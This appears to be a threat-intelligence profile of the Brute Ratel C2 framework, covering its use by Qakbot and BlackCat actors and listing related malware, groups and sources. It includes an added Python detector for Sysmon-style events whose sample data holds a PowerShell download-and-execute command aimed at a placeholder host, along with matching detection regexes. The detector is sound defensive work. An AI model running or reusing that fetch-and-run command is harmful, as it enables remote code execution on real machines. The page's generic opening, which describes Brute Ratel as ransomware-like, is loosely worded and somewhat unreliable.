Brute Ratel

Malware Profile Updated 13 days ago
Brute Ratel is malicious software (malware) that cybercriminals have used to compromise and damage computer systems. It can enter a system through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, Brute Ratel can steal personal information, disrupt operations, or hold data hostage for ransom. The malware operates as a beacon to command and control (C2) servers, giving the operator remote access capabilities comparable to the penetration-testing suite Cobalt Strike.

The SharpHound collector is executed via Brute Ratel inside an injected svchost.exe process and writes its output as JSON files. These files are then ingested into BloodHound; they describe various aspects of Active Directory organizational units, such as Group Policies, domains, user groups, computers, and users.

ALPHV BlackCat affiliates have claimed to use Brute Ratel C4 and Cobalt Strike as beacons to their command and control servers. They also employ the open-source adversary-in-the-middle attack framework Evilginx2, which lets them obtain multifactor authentication (MFA) credentials, login credentials, and session cookies.

Qakbot-affiliated actors have increasingly used Brute Ratel as a vehicle to drop other malware, most notably Cobalt Strike and a range of ransomware. In one instance, attackers installed the Brute Ratel binary as a Windows service named "wewe" on at least one affected machine. They also used PowerShell commands to download and execute Cobalt Strike beacons on some machines, further demonstrating the versatile and damaging nature of this malware.
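As an added example (not from this profile or any of the reports it cites), the following Python detector runs three checks over constructed Sysmon-style and System-log events for behaviours named above: a newly installed service whose binary lives outside the Windows system directories (the "wewe" service case, generalised beyond the one name), svchost.exe writing JSON files (SharpHound collection from an injected svchost), and a PowerShell command line that both downloads remote content and evaluates it. Field names follow Sysmon ProcessCreate (1) and FileCreate (11) and the System log's 7045 service-install event; the event shape, file paths and the placeholder.invalid host are assumptions made for the example.

```python
import re

# Constructed sample events in a simplified Sysmon/System-log dict form
# (Sysmon 1 = ProcessCreate, 11 = FileCreate; System 7045 = service installed).
# Made up for this example; not telemetry from any incident.
SAMPLE_EVENTS = [
    {"id": "7045", "ServiceName": "wewe", "ImagePath": r"C:\ProgramData\svc\badger.exe"},
    {"id": "7045", "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": "11", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Users\Public\20240101_computers.json"},
    {"id": "11", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\Temp\update.log"},
    {"id": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://placeholder.invalid/p')\""},
    {"id": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Service"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
FETCH = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)

def service_binary_outside_system_dirs(ev):
    # Matching only the reported name "wewe" is brittle; the binary's location
    # also catches renamed installs of the same implant.
    path = ev.get("ImagePath", "").strip('"').lower()
    return ev["id"] == "7045" and not path.startswith(SYSTEM_DIRS)

def svchost_writes_json(ev):
    # A genuine service host has no reason to write .json collection files;
    # SharpHound running in an injected svchost.exe does exactly that.
    return (ev["id"] == "11"
            and ev.get("Image", "").lower().endswith("\\svchost.exe")
            and ev.get("TargetFilename", "").lower().endswith(".json"))

def powershell_download_and_execute(ev):
    # Command line that both fetches remote content and evaluates it.
    cmd = ev.get("CommandLine", "")
    return (ev["id"] == "1" and "powershell" in ev.get("Image", "").lower()
            and bool(FETCH.search(cmd)) and bool(EXECUTE.search(cmd)))

RULES = (service_binary_outside_system_dirs, svchost_writes_json,
         powershell_download_and_execute)

def scan(events):
    """Return (rule_name, event) pairs for every event that trips a rule."""
    return [(rule.__name__, ev) for ev in events for rule in RULES if rule(ev)]
```

Running `scan(SAMPLE_EVENTS)` flags exactly the three constructed malicious events and leaves the benign Spooler install, the .log write and the plain Get-Service invocation alone.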
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Cobalt Strike
Ransomware
Malware
Windows
Exploit
Implant
Payload
Apt
Spearphishing
Associated Malware
ID (Type, Votes): Profile Description
QakBot (Unspecified, 5 votes): Qakbot is a type of malware, or malicious software, designed to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites and can steal personal information, disrupt operations, or hold data for ransom. Qakbot is among several malware families buil
Black Basta (Unspecified, 5 votes): Black Basta is a prolific malware, specifically a Ransomware-as-a-Service (RaaS) operator, originating from Russia. It is believed to be an offshoot of the notorious Conti ransomware group, which ceased operations just prior to Black Basta's emergence. The malware uses popular initial access techniq
PlugX (Unspecified, 2 votes): PlugX is a sophisticated malware predominantly used by various Chinese Advanced Persistent Threat (APT) groups like PKPLUG, but also found in the hands of non-Chinese threat actors due to its circulation in underground hacking communities. This modular backdoor has evolved through different stages,
Qbot (Unspecified, 2 votes): Qbot, also known as Qakbot or Pinkslipbot, is a modular information-stealing malware that emerged in 2007 as a banking trojan. Over time, it has evolved into an advanced strain of malware used by multiple cybercriminal groups to prepare compromised networks for ransomware infestations. The attack ch
Conti (Unspecified, 2 votes): Conti is a malware program known for its disruptive capabilities, including stealing personal information and holding data hostage for ransom. It gained notoriety as part of the arsenal of ITG23, a cybercrime group that used it in conjunction with other malicious software like Trickbot, BazarLoader,
Associated Threat Actors
ID (Type, Votes): Profile Description
Alphv (Unspecified, 2 votes): Alphv, also known as BlackCat, is a notorious threat actor that emerged in December 2021. The group has been responsible for numerous high-profile cyberattacks, including those against Clarion, a global manufacturer of audio and video equipment for cars; Morrison Community Hospital, from which they
The Dukes (Unspecified, 2 votes): The Dukes, also known as APT29, Cozy Bear, Midnight Blizzard, BlueBravo, and Nobelium, is a cyber espionage group believed to be affiliated with the Russian Foreign Intelligence Service (SVR). The group first came into prominence in 2015 when an FBI agent alerted the Democratic National Committee (D
Sandworm (Unspecified, 2 votes): Sandworm is a Russia-linked Advanced Persistent Threat (APT) group, recognized for its malicious cyber activities. The group has been associated with several high-profile attacks, including compromising 11 Ukrainian telecommunications providers and deploying the previously unknown Kapeka backdoor. S
Associated Vulnerabilities
No associations to display
Source Document References
Information about the Brute Ratel malware was read from the documents corpus below. This display is limited to 20 results.
Source (Created): Title
CERT-EU (10 months ago): First Known Targeted OSS Supply Chain Attacks Against the Banking Sector
InfoSecurity-magazine (10 months ago): Novel Open Source Supply Chain Attacks Target Banking Sector
CERT-EU (8 months ago): Identification and Disruption of QakBot Infrastructure - KizzMyAnthia.com
CERT-EU (3 months ago): US healthcare alerted against BlackCat amid targeted attacks | #ransomware | #cybercrime | National Cyber Security Consulting
BankInfoSecurity (a year ago): Royal Ransomware Group Builds Its Own Malware Loader
CISA (9 months ago): Identification and Disruption of QakBot Infrastructure | CISA
CERT-EU (3 months ago): US Government Warns Healthcare is Biggest Target for BlackCat Affiliat
MITRE (5 months ago): BlackCat ransomware attacks not merely a byproduct of bad luck
Yoroi (a year ago): Hunting Cyber Evil Ratels: From the targeted attacks to the widespread usage of Brute Ratel - Yoroi
DARKReading (5 months ago): Qakbot Sightings Confirm Law Enforcement Takedown Was Only a Setback
DARKReading (a year ago): APT41 Taps Google Red Teaming Tool in Targeted Info-Stealing Attacks
DARKReading (a year ago): Exfiltrator-22 Post-Exploitation Toolkit Nips At Cobalt Strike's Heels
Canadian Centre for Cyber Security (a year ago): Ongoing reports of Qakbot malware incidents – Update 1 - Canadian Centre for Cyber Security
CERT-EU (10 months ago): Banking sector targeted in novel OSS supply chain attacks
MITRE (5 months ago): Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike
CERT-EU (a year ago): Attackers reduce complexity to catch more potential victims | #hacking | #cybersecurity | #infosec | #comptia | #pentest | #ransomware - National Cyber Security
Fortinet (10 months ago): Ransomware Roundup - Black Basta | FortiGuard Labs
DARKReading (a year ago): ESET APT Report: Attacks by China-, North Korea-, and Iran-aligned Threat Actors; Russia Eyes Ukraine and the EU
Recorded Future (a year ago): 2022 Adversary Infrastructure Report
Securityaffairs (10 months ago): Experts warn of OSS supply chain attacks on the banking sector